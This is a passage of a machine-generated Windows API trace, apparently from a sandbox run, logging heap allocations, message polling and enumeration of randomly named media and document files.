cAlternateFileName="FDKSRT~1.GIF")) returned 1 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0217.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0217.153] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb40a45c0, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0xae0c73b0, ftLastAccessTime.dwHighDateTime=0x1d5e500, ftLastWriteTime.dwLowDateTime=0xae0c73b0, ftLastWriteTime.dwHighDateTime=0x1d5e500, nFileSizeHigh=0x0, nFileSizeLow=0xad28, dwReserved0=0x0, dwReserved1=0x0, cFileName="FpHVdISbKXY46o.doc", cAlternateFileName="FPHVDI~1.DOC")) returned 1 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0217.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0217.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x480) returned 0x3be0048 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9785a8 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0217.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.155] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b432e0, ftCreationTime.dwHighDateTime=0x1d5ebc4, ftLastAccessTime.dwLowDateTime=0x176d6600, ftLastAccessTime.dwHighDateTime=0x1d5ef08, ftLastWriteTime.dwLowDateTime=0x176d6600, ftLastWriteTime.dwHighDateTime=0x1d5ef08, nFileSizeHigh=0x0, nFileSizeLow=0x2a33, dwReserved0=0x0, dwReserved1=0x0, cFileName="GxeLAc.mp3", cAlternateFileName="")) returned 1 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0217.157] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b122980, ftCreationTime.dwHighDateTime=0x1d5ed6b, ftLastAccessTime.dwLowDateTime=0x6a09f990, ftLastAccessTime.dwHighDateTime=0x1d5e0c7, ftLastWriteTime.dwLowDateTime=0x6a09f990, ftLastWriteTime.dwHighDateTime=0x1d5e0c7, nFileSizeHigh=0x0, nFileSizeLow=0x140f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hr9y61oAkM-K.flv", cAlternateFileName="HR9Y61~1.FLV")) returned 1 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0217.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.158] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365f2f00, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0xb903a490, ftLastAccessTime.dwHighDateTime=0x1d5f019, ftLastWriteTime.dwLowDateTime=0xb903a490, ftLastWriteTime.dwHighDateTime=0x1d5f019, nFileSizeHigh=0x0, nFileSizeLow=0xcb91, dwReserved0=0x0, dwReserved1=0x0, cFileName="IYqWm9FjXEquwVFEM.wav", cAlternateFileName="IYQWM9~1.WAV")) returned 1 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0217.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0217.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0217.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0217.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.159] 